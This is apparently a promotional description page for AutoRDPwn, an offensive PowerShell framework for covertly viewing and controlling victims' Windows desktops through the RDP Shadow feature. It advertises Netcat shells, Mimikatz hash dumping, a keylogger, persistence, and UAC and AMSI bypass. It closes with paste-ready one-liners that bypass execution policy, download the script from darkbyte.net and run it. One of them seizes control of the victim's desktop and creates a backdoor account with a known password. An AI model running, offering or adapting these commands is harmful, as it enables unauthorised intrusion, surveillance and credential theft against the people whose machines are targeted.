AutoRDPwn is a post-exploitation framework created in Powershell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view his victim's desktop without his consent, and even control it on-demand, using tools native to the operating system itself.
Thanks to the additional modules, it is possible to obtain a remote shell through Netcat, dump system hashes with Mimikatz, load a remote keylogger and much more. All this, Through a completely intuitive menu in seven different languages.
Additionally, it is possible to use it in a reverse shell through a series of parameters that are described in the usage section.
Requirements
Powershell 4.0 or higher
Changes
Version 5.0
• New logo completely redesigned from scratch
• Full translation in 7 languages: es, en, fr, de, it, ru, pt
• Remote execution through a reverse shell with UAC and AMSI Bypass
• Partial support from Linux (more information in the user guide)
• Improved remote execution (internet connection is no longer necessary on the victim)
• New section available: Backdoors and persistence
• New module available: Remote Keylogger
• New section available: Privilege escalation
• New module available: Obtain information from the operating system
• New module available: Search vulnerabilities with Sherlock
• New module available: Escalate privileges with PowerUp
• New section available: Other Modules
• New module available: Execute an external script
*The rest of the changes can be consulted in the CHANGELOG file
Use
This application can be used locally, remotely or to pivot between teams.
When used remotely in a reverse shell, it is necessary to use the following parameters:
-admin / -noadmin -> Depending on the permissions we have, we will use one or the other
-nogui -> This will avoid loading the menu and some colors, guaranteed its functionality
-lang -> We will choose our language (English, Spanish, French, German, Italian, Russian or Portuguese)
-option -> As with the menu, we can choose how to launch the attack
-shadow -> We will decide if we want to see or control the remote device
-createuser -> This parameter is optional, the user AutoRDPwn (password: AutoRDPwn) will be created on the victim machine
Local execution on one line:
powershell -ep bypass "cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"
Example of remote execution on a line:
powershell -ep bypass "cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"
The detailed guide of use can be found at the following link:
Darkbyte • AutoRDPwn - La guía definitiva
Después de dos meses de intenso desarrollo, AutoRDPwn es más potente y funcional que nunca. Gracias al éxito que ha tenido, he decidido crear una guía.
darkbyte.net
Screenshots
Download AutoRDPwn